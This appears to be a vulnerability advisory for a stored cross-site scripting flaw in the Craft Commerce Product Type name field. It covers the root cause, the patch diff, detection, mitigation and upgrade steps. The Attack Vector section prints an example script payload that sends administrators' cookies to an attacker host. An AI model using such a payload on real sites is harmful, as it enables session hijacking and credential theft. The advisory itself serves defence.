CVE-2026-25484 Overview
CVE-2026-25484 is a Stored Cross-Site Scripting (XSS) vulnerability affecting Craft Commerce, an ecommerce platform built for Craft CMS. The vulnerability exists due to insufficient input sanitization of Product Type names when displayed in user permissions settings. An attacker with administrative privileges can inject malicious scripts through the Commerce Product Type settings interface, which are then executed when other administrators view the CMS user permissions settings.
Critical Impact
Administrative users with access to Commerce Product Type settings can inject persistent malicious JavaScript that executes in the context of other administrators viewing user permissions, potentially leading to session hijacking, credential theft, or unauthorized administrative actions.
Affected Products
- Craft Commerce versions 4.0.0-RC1 through 4.10.0
- Craft Commerce versions 5.0.0 through 5.5.1
- Craft CMS installations with vulnerable Craft Commerce plugin versions
Discovery Timeline
- 2026-02-03 - CVE-2026-25484 published to NVD
- 2026-02-04 - Last updated in NVD database
Technical Details for CVE-2026-25484
Vulnerability Analysis
This Stored XSS vulnerability involves a cross-component attack path where the injection point (source) and execution point (sink) reside in different application areas. The vulnerable input is accepted through the Commerce module's Product Type settings, specifically the name field. However, the malicious payload is rendered and executed in a different context—the CMS user permissions settings page.
The issue stems from the Twig template rendering the Product Type name without proper output encoding. When administrators navigate to user permissions settings, the unsanitized Product Type names are rendered directly into the HTML context, allowing any injected JavaScript to execute within the administrator's browser session.
Root Cause
The root cause is improper output encoding in the Twig template file src/templates/settings/producttypes/index.twig. The Product Type name was being passed through the translation filter (|t('site')) but not through an escape filter (|e), allowing HTML and JavaScript content to be rendered as executable code rather than safely encoded text. This represents a classic CWE-79 (Improper Neutralization of Input During Web Page Generation) vulnerability.
Attack Vector
The attack requires an authenticated user with privileges to create or modify Product Type settings in the Commerce module. The attacker creates or edits a Product Type, embedding malicious JavaScript in the name field (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>). When any administrator subsequently views the user permissions settings page where Product Types are listed, the malicious script executes in their browser context, potentially allowing session hijacking, CSRF attacks, or other malicious actions performed with the victim's administrative privileges.
{% set tableData = tableData|merge([{
id: type.id,
- title: type.name|t('site'),
+ title: type.name|t('site')|e,
url: type.cpEditUrl,
handle: type.handle|e,
maxVariants: type.maxVariants ?? '',
Source: GitHub Commit Update
Detection Methods for CVE-2026-25484
Indicators of Compromise
- Review Product Type names in the Commerce settings for suspicious HTML tags or JavaScript code
- Monitor web server logs for unusual POST requests to Product Type creation/modification endpoints containing script tags or encoded JavaScript
- Check for unexpected outbound network connections from administrator browsers when viewing permissions settings
Detection Strategies
- Implement Content Security Policy (CSP) headers to detect and block inline script execution attempts
- Enable web application firewall (WAF) rules to flag requests containing XSS payloads in form submissions
- Audit Commerce Product Type names in the database for entries containing HTML special characters (<, >, ", ')
- Deploy browser-based XSS detection tools that alert on suspicious DOM modifications
Monitoring Recommendations
- Configure centralized logging for all administrative actions in Craft CMS and Commerce
- Set up alerts for Product Type creation or modification events with names exceeding normal length thresholds
- Monitor for JavaScript errors or unexpected script execution in administrator browser sessions
- Implement regular automated security scans of the Craft Commerce installation
How to Mitigate CVE-2026-25484
Immediate Actions Required
- Update Craft Commerce immediately to version 4.10.1 (for 4.x branch) or 5.5.2 (for 5.x branch)
- Audit existing Product Type names for any signs of malicious content and sanitize if found
- Review administrative access logs to identify any suspicious Product Type modifications
- Temporarily restrict Product Type modification privileges to essential personnel only until patching is complete
Patch Information
Craft Commerce has released patched versions that address this vulnerability by adding proper output encoding to the Product Type name display. The fix adds the Twig escape filter (|e) to properly encode the Product Type name when rendered in templates. Security patches are available through official releases:
- Craft Commerce 4.10.1 - Fixes vulnerability for 4.x branch
- Craft Commerce 5.5.2 - Fixes vulnerability for 5.x branch
For complete technical details, see the GitHub Security Advisory GHSA-2h2m-v2mg-656c.
Workarounds
- Implement strict Content Security Policy (CSP) headers that disallow inline script execution to mitigate XSS impact
- Restrict administrative access to Commerce Product Type settings to only trusted users
- Manually sanitize existing Product Type names by removing any HTML or script content
- Consider implementing input validation at the application layer to reject Product Type names containing HTML characters
# Configuration example
# Add CSP headers to your web server configuration (nginx example)
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline';" always;
# Update Craft Commerce via Composer
composer require craftcms/commerce:4.10.1 # For 4.x installations
# OR
composer require craftcms/commerce:5.5.2 # For 5.x installations
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
